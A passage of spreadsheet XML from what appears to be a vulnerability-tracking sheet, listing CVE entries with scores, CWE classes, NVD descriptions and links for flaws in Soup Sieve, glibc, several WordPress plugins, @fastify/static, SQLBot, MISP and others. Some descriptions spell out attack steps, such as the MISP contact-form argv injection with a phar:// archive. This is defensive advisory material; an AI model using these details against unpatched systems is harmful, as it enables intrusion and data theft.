          <t>Soup Sieve is a CSS selector library designed to be used with Beautiful Soup 4. Prior to 2.9, the selector parser in src/soupsieve/css_parser.py defines IDENTIFIER with adjacent quantified groups over overlapping character classes, and VALUE embeds IDENTIFIER for attribute selectors. When an attacker-controlled selector contains a long identifier or unquoted attribute-value run followed by input that makes the overall match fail, the regular expression engine explores quadratically many splits between the overlapping groups. User-controlled selectors can reach this path through soupsieve.compile(), soupsieve.select(), or BeautifulSoup.select(), while applications using only hard-coded selectors are unaffected. The resulting CPU consumption can hold the Python GIL, exhaust application workers, and stall a service; successful plain identifier matches are linear, and the issue does not cause memory corruption or code execution. The issue is fixed in version 2.9.</t>
        </is>
      </c>
      <c r="T330" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86000</t>
        </is>
      </c>
    </row>
    <row r="331">
      <c r="A331" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B331" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C331" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-8674</t>
        </is>
      </c>
      <c r="D331" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E331" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F331" s="5" t="inlineStr">
        <is>
          <t>3ff69d7a-14f2-4f67-a097-88dee7810d18</t>
        </is>
      </c>
      <c r="G331" s="5" t="inlineStr"/>
      <c r="H331" s="5" t="inlineStr"/>
      <c r="I331" s="5" t="inlineStr"/>
      <c r="J331" s="5" t="inlineStr"/>
      <c r="K331" s="5" t="inlineStr"/>
      <c r="L331" s="5" t="inlineStr"/>
      <c r="M331" s="5" t="inlineStr"/>
      <c r="N331" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O331" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P331" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q331" s="5" t="inlineStr"/>
      <c r="R331" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="S331" s="5" t="inlineStr">
        <is>
          <t>Initializing the DNS stub resolver from an /etc/resolv.conf file, or a LOCALDOMAIN environment variable, whose search list contains a domain of roughly 200 characters or more in the GNU C Library version 2.26 to 2.44 results in an assertion failure which aborts the process.
The resolver truncates the search list when copying it into the fixed-size _res.defdname buffer, then asserts that the copy is consistent with the full configuration.  The consistency check compared against the wrong size and did not handle a first entry that does not fit, so a correctly truncated list failed the assertion.  Any process that resolves names through the library is affected, including long-running processes that reload /etc/resolv.conf on the next query after it changes.  Search domains are commonly written to /etc/resolv.conf from data received over DHCP or from a VPN server, so an attacker on the local network may be able to trigger this without privileges on the target system, subject to validation by the network configuration software.</t>
        </is>
      </c>
      <c r="T331" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-8674</t>
        </is>
      </c>
    </row>
    <row r="332">
      <c r="A332" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B332" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C332" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89064</t>
        </is>
      </c>
      <c r="D332" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E332" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F332" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G332" s="5" t="inlineStr"/>
      <c r="H332" s="5" t="inlineStr"/>
      <c r="I332" s="5" t="inlineStr"/>
      <c r="J332" s="5" t="inlineStr"/>
      <c r="K332" s="5" t="inlineStr"/>
      <c r="L332" s="5" t="inlineStr"/>
      <c r="M332" s="5" t="inlineStr"/>
      <c r="N332" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O332" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P332" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q332" s="5" t="inlineStr"/>
      <c r="R332" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="S332" s="5" t="inlineStr">
        <is>
          <t>The All-in-One WP Migration and Backup plugin for WordPress is vulnerable to Insufficient Credential Protection in versions up to, and including, 7.110. This is due to the `Ai1wm_Main_Controller::init()` method — registered on the `admin_init` hook, which fires unauthenticated on `admin-ajax.php` and `admin-post.php` requests — reading `$_SERVER['PHP_AUTH_USER']` and `$_SERVER['PHP_AUTH_PW']` from any incoming request and writing them to the `ai1wm_auth_header` option via `update_option()` as a reversible base64-encoded string, with no capability check, nonce verification, `is_user_logged_in()` check, or confirmation that Basic authentication actually succeeded. This makes it possible for unauthenticated attackers to capture into the database, in reversible base64 form, any WordPress Application Password or HTTP Basic credential presented to `/wp-admin/` by a legitimate integration, or to overwrite the stored credential with an attacker-chosen value by sending an anonymous request carrying a crafted `Authorization: Basic` header. This is particularly impactful in environments using WordPress Application Passwords for REST API or third-party integrations, as those credentials are transmitted as HTTP Basic auth to `/wp-admin/` and will be silently harvested via this unauthenticated write path.</t>
        </is>
      </c>
      <c r="T332" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89064</t>
        </is>
      </c>
    </row>
    <row r="333">
      <c r="A333" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B333" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C333" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90922</t>
        </is>
      </c>
      <c r="D333" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E333" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F333" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G333" s="5" t="inlineStr"/>
      <c r="H333" s="5" t="inlineStr"/>
      <c r="I333" s="5" t="inlineStr"/>
      <c r="J333" s="5" t="inlineStr"/>
      <c r="K333" s="5" t="inlineStr"/>
      <c r="L333" s="5" t="inlineStr"/>
      <c r="M333" s="5" t="inlineStr"/>
      <c r="N333" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O333" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P333" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q333" s="5" t="inlineStr"/>
      <c r="R333" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S333" s="5" t="inlineStr">
        <is>
          <t>The Paid Membership Subscriptions  WordPress plugin before 3.0.9 does not verify that the amount and currency reported by the payment provider match the pending payment before completing it, allowing unauthenticated users to obtain a paid membership by paying an arbitrary lower amount.</t>
        </is>
      </c>
      <c r="T333" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90922</t>
        </is>
      </c>
    </row>
    <row r="334">
      <c r="A334" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B334" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C334" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90982</t>
        </is>
      </c>
      <c r="D334" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E334" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F334" s="5" t="inlineStr">
        <is>
          <t>ce714d77-add3-4f53-aff5-83d477b104bb</t>
        </is>
      </c>
      <c r="G334" s="5" t="inlineStr"/>
      <c r="H334" s="5" t="inlineStr"/>
      <c r="I334" s="5" t="inlineStr"/>
      <c r="J334" s="5" t="inlineStr"/>
      <c r="K334" s="5" t="inlineStr"/>
      <c r="L334" s="5" t="inlineStr"/>
      <c r="M334" s="5" t="inlineStr"/>
      <c r="N334" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O334" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P334" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q334" s="5" t="inlineStr"/>
      <c r="R334" s="5" t="inlineStr">
        <is>
          <t>CWE-178, CWE-284</t>
        </is>
      </c>
      <c r="S334" s="5" t="inlineStr">
        <is>
          <t>@fastify/static is a Fastify plugin that serves static files from a configured root directory. In versions before 10.1.4, on a case-insensitive filesystem such as Windows or the default macOS volume, a route guard or allowedPath restriction can be bypassed by altering the letter case of a path segment. The route matcher is case-sensitive while the filesystem is not, so a request that changes the case of a protected segment does not match the guarded route and falls through to the static handler, yet the filesystem resolves it to the same protected file. As a result, an unauthenticated request can read a file that a route guard or allowedPath was configured to protect. The issue does not affect case-sensitive filesystems and is not a directory traversal, since nothing is served from outside the configured root. The issue is fixed in @fastify/static 10.1.4, which validates the requested path against its actual on-disk spelling and rejects case-aliased paths before authorization. As a workaround, serve static files from a case-sensitive filesystem, or ensure route guards and allowedPath rules account for every letter-case variant of the protected paths.</t>
        </is>
      </c>
      <c r="T334" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90982</t>
        </is>
      </c>
    </row>
    <row r="335">
      <c r="A335" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B335" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C335" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91015</t>
        </is>
      </c>
      <c r="D335" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E335" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F335" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G335" s="5" t="inlineStr"/>
      <c r="H335" s="5" t="inlineStr"/>
      <c r="I335" s="5" t="inlineStr"/>
      <c r="J335" s="5" t="inlineStr"/>
      <c r="K335" s="5" t="inlineStr"/>
      <c r="L335" s="5" t="inlineStr"/>
      <c r="M335" s="5" t="inlineStr"/>
      <c r="N335" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O335" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P335" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q335" s="5" t="inlineStr"/>
      <c r="R335" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S335" s="5" t="inlineStr">
        <is>
          <t>The Master Addons for Elementor  WordPress plugin before 3.1.9 does not perform an authorization check on the AJAX action that deactivates its Popup Builder popups, relying only on a nonce that is publicly output to every visitor, allowing unauthenticated attackers to permanently disable any popup on the site.</t>
        </is>
      </c>
      <c r="T335" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91015</t>
        </is>
      </c>
    </row>
    <row r="336">
      <c r="A336" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B336" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C336" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91016</t>
        </is>
      </c>
      <c r="D336" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E336" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F336" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G336" s="5" t="inlineStr"/>
      <c r="H336" s="5" t="inlineStr"/>
      <c r="I336" s="5" t="inlineStr"/>
      <c r="J336" s="5" t="inlineStr"/>
      <c r="K336" s="5" t="inlineStr"/>
      <c r="L336" s="5" t="inlineStr"/>
      <c r="M336" s="5" t="inlineStr"/>
      <c r="N336" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O336" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P336" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q336" s="5" t="inlineStr"/>
      <c r="R336" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S336" s="5" t="inlineStr">
        <is>
          <t>The Motors  WordPress plugin before 1.4.121 does not verify that a request is authorized to view a user's non-published listings before returning them, allowing unauthenticated attackers to read any author's draft, pending and private car listings - including titles, prices, media URLs and seller notes - by supplying only the target's numeric user id.</t>
        </is>
      </c>
      <c r="T336" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91016</t>
        </is>
      </c>
    </row>
    <row r="337">
      <c r="A337" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B337" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C337" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92879</t>
        </is>
      </c>
      <c r="D337" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E337" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F337" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G337" s="5" t="inlineStr"/>
      <c r="H337" s="5" t="inlineStr"/>
      <c r="I337" s="5" t="inlineStr"/>
      <c r="J337" s="5" t="inlineStr"/>
      <c r="K337" s="5" t="inlineStr"/>
      <c r="L337" s="5" t="inlineStr"/>
      <c r="M337" s="5" t="inlineStr"/>
      <c r="N337" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O337" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P337" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q337" s="5" t="inlineStr"/>
      <c r="R337" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-404</t>
        </is>
      </c>
      <c r="S337" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in vgmstream up to r2117. This issue affects the function parse_mus of the file src/meta/mus_acm.c. The manipulation results in resource consumption. The attack may be launched remotely. The patch is identified as ae37662ad626254ddd96ad69ac263792d7a92024. Applying a patch is advised to resolve this issue.</t>
        </is>
      </c>
      <c r="T337" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92879</t>
        </is>
      </c>
    </row>
    <row r="338">
      <c r="A338" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B338" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C338" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92920</t>
        </is>
      </c>
      <c r="D338" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E338" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F338" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G338" s="5" t="inlineStr"/>
      <c r="H338" s="5" t="inlineStr"/>
      <c r="I338" s="5" t="inlineStr"/>
      <c r="J338" s="5" t="inlineStr"/>
      <c r="K338" s="5" t="inlineStr"/>
      <c r="L338" s="5" t="inlineStr"/>
      <c r="M338" s="5" t="inlineStr"/>
      <c r="N338" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O338" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P338" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q338" s="5" t="inlineStr"/>
      <c r="R338" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="S338" s="5" t="inlineStr">
        <is>
          <t>admin3 through 3.0.0 fails to invalidate existing sessions when disabling a user account, allowing attackers to retain authenticated access with original permissions. Attackers can continue using bearer tokens issued before account disablement to authenticate requests, as the AuthInterceptor never re-validates the user's locked status and session expiry resets on each request.</t>
        </is>
      </c>
      <c r="T338" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92920</t>
        </is>
      </c>
    </row>
    <row r="339">
      <c r="A339" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B339" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C339" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92927</t>
        </is>
      </c>
      <c r="D339" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E339" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F339" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G339" s="5" t="inlineStr"/>
      <c r="H339" s="5" t="inlineStr"/>
      <c r="I339" s="5" t="inlineStr"/>
      <c r="J339" s="5" t="inlineStr"/>
      <c r="K339" s="5" t="inlineStr"/>
      <c r="L339" s="5" t="inlineStr"/>
      <c r="M339" s="5" t="inlineStr"/>
      <c r="N339" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O339" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P339" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q339" s="5" t="inlineStr"/>
      <c r="R339" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-284</t>
        </is>
      </c>
      <c r="S339" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in SourceCodester Drug Recommendation System 1.0. This issue affects some unknown processing of the file /db/drug_recommendor.sql. Performing a manipulation results in information disclosure. The attack is possible to be carried out remotely. The exploit has been made public and could be used.</t>
        </is>
      </c>
      <c r="T339" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92927</t>
        </is>
      </c>
    </row>
    <row r="340">
      <c r="A340" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B340" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C340" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92963</t>
        </is>
      </c>
      <c r="D340" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E340" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F340" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G340" s="5" t="inlineStr"/>
      <c r="H340" s="5" t="inlineStr"/>
      <c r="I340" s="5" t="inlineStr"/>
      <c r="J340" s="5" t="inlineStr"/>
      <c r="K340" s="5" t="inlineStr"/>
      <c r="L340" s="5" t="inlineStr"/>
      <c r="M340" s="5" t="inlineStr"/>
      <c r="N340" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O340" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P340" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q340" s="5" t="inlineStr"/>
      <c r="R340" s="5" t="inlineStr">
        <is>
          <t>CWE-227</t>
        </is>
      </c>
      <c r="S340" s="5" t="inlineStr">
        <is>
          <t>vm2 versions before 3.11.2 fail to properly restrict access to the VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL global variable. Attackers can access this internal state object through globalThis to retrieve sensitive sandbox internals.</t>
        </is>
      </c>
      <c r="T340" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92963</t>
        </is>
      </c>
    </row>
    <row r="341">
      <c r="A341" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B341" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C341" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92973</t>
        </is>
      </c>
      <c r="D341" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E341" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F341" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G341" s="5" t="inlineStr"/>
      <c r="H341" s="5" t="inlineStr"/>
      <c r="I341" s="5" t="inlineStr"/>
      <c r="J341" s="5" t="inlineStr"/>
      <c r="K341" s="5" t="inlineStr"/>
      <c r="L341" s="5" t="inlineStr"/>
      <c r="M341" s="5" t="inlineStr"/>
      <c r="N341" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O341" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P341" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q341" s="5" t="inlineStr"/>
      <c r="R341" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S341" s="5" t="inlineStr">
        <is>
          <t>ansi2html versions 1.7.0a0 through 1.9.3 contain a cross-site scripting vulnerability in OSC 8 hyperlink handling that fails to validate or escape URL targets. Attackers controlling ANSI text input can inject javascript: schemes or terminate href attributes to execute arbitrary scripts in the context of pages displaying converted output.</t>
        </is>
      </c>
      <c r="T341" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92973</t>
        </is>
      </c>
    </row>
    <row r="342">
      <c r="A342" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B342" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C342" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53555</t>
        </is>
      </c>
      <c r="D342" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E342" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F342" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G342" s="5" t="inlineStr"/>
      <c r="H342" s="5" t="inlineStr"/>
      <c r="I342" s="5" t="inlineStr"/>
      <c r="J342" s="5" t="inlineStr"/>
      <c r="K342" s="5" t="inlineStr"/>
      <c r="L342" s="5" t="inlineStr"/>
      <c r="M342" s="5" t="inlineStr"/>
      <c r="N342" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O342" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P342" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q342" s="5" t="inlineStr"/>
      <c r="R342" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S342" s="5" t="inlineStr">
        <is>
          <t>SQLBot is an intelligent Text-to-SQL system based on large language models and RAG. Prior to 1.9.0, an authenticated uploader can submit an image/svg+xml assistant UI logo through PATCH /api/v1/system/assistant/ui, and SQLBot stores the SVG without sanitizing or validating embedded active content. SQLBot later serves the file inline from the same application origin through GET /api/v1/system/assistant/picture/{filename}. When another user loads that generated resource, JavaScript embedded in the SVG executes in the SQLBot web application context, resulting in stored cross-site scripting with access to data and actions available to the victim's session. This issue is fixed in version 1.9.0.</t>
        </is>
      </c>
      <c r="T342" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53555</t>
        </is>
      </c>
    </row>
    <row r="343">
      <c r="A343" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B343" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C343" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92932</t>
        </is>
      </c>
      <c r="D343" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E343" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F343" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G343" s="5" t="inlineStr"/>
      <c r="H343" s="5" t="inlineStr"/>
      <c r="I343" s="5" t="inlineStr"/>
      <c r="J343" s="5" t="inlineStr"/>
      <c r="K343" s="5" t="inlineStr"/>
      <c r="L343" s="5" t="inlineStr"/>
      <c r="M343" s="5" t="inlineStr"/>
      <c r="N343" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O343" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P343" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q343" s="5" t="inlineStr"/>
      <c r="R343" s="5" t="inlineStr">
        <is>
          <t>CWE-670, CWE-918</t>
        </is>
      </c>
      <c r="S343" s="5" t="inlineStr">
        <is>
          <t>In the MISP sachertortephp library, the Xml::build() static method in lib/Cake/Utility/Xml.php contains a logic error in the conditional that gates network-based XML fetching. The original condition was written as: $options['readFile'] &amp;&amp; strpos($input, 'http://') === 0 || strpos($input, 'https://') === 0. Because PHP's &amp;&amp; operator has higher precedence than ||, the expression is evaluated as ($options['readFile'] &amp;&amp; strpos($input, 'http://') === 0) || strpos($input, 'https://') === 0. As a result, when a caller explicitly sets the readFile option to false to disable file and URL reading, an input string beginning with https:// still satisfies the condition and triggers a network fetch via HttpSocket (configured to follow up to 10 redirects). The http:// branch is correctly gated by the readFile flag, but the https:// branch is not. An attacker who can influence the $input parameter passed to Xml::build() can therefore force the application to issue an outbound HTTPS request to an attacker-controlled or internal URL, even though the caller intended to suppress all remote reads. The fetched response is parsed as XML and may be returned to the caller, enabling information disclosure from internal services or external targets. This constitutes a Server-Side Request Forgery (SSRF) weakness with an information-disclosure impact. The vulnerability requires that the code path in Xml::build() be reachable with attacker-controlled input and that the readFile option be set to false (or the caller expects it to be false).</t>
        </is>
      </c>
      <c r="T343" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92932</t>
        </is>
      </c>
    </row>
    <row r="344">
      <c r="A344" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B344" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C344" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93295</t>
        </is>
      </c>
      <c r="D344" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E344" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F344" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G344" s="5" t="inlineStr"/>
      <c r="H344" s="5" t="inlineStr"/>
      <c r="I344" s="5" t="inlineStr"/>
      <c r="J344" s="5" t="inlineStr"/>
      <c r="K344" s="5" t="inlineStr"/>
      <c r="L344" s="5" t="inlineStr"/>
      <c r="M344" s="5" t="inlineStr"/>
      <c r="N344" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O344" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P344" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q344" s="5" t="inlineStr"/>
      <c r="R344" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-74</t>
        </is>
      </c>
      <c r="S344" s="5" t="inlineStr">
        <is>
          <t>MISP contains a vulnerability in its background job dispatch mechanism that allows remote code execution as the web user. Background job arguments are passed directly as the argv of the CakePHP console process. CakePHP's ShellDispatcher::_parsePaths() scans the entire argv for path switches (-app, --app, -working, --working, -root, --root, -webroot, --webroot) and uses the following element as the application root. The events/contact endpoint passes user-controlled fields (message and person) into job arguments without validation. An attacker who can submit the contact form can set the person field to a reserved switch (e.g., -app) and the message field to a phar:// URI pointing to a malicious archive. The CakePHP bootstrap then includes Config/core.php from within that archive, executing attacker-controlled PHP code with the privileges of the web user. The vulnerability requires the ability to submit the events/contact form (or any other endpoint that forwards user input into background job arguments). No special timing or race condition is required; the attack is deterministic once the crafted parameters are accepted. The impact is full remote code execution in the context of the MISP web server process, allowing data exfiltration, persistence, and lateral movement within the host.</t>
        </is>
      </c>
      <c r="T344" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93295</t>
        </is>
      </c>
    </row>
    <row r="345">
      <c r="A345" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B345" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
